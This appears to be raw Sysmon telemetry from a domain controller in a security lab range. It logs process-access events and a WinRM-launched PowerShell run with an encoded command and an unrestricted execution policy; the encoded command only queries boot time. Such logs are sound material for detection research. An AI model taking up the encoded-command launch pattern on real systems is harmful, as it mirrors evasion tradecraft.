12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.174{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.174{266CAFBE-6497-6064-8400-00000000AE01}728736C:\Windows\system32\cmd.exe{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.171{266CAFBE-6497-6064-8500-00000000AE01}712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-4335-070000000000}0x735430HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe 
/C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000003418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-6497-6064-8300-00000000AE01}44724460C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.158{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-6497-6064-8200-00000000AE01}44324488C:\Windows\system32\WinrsHost.exe{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.164{266CAFBE-6497-6064-8400-00000000AE01}728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-4335-070000000000}0x735430HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.158{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.158{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 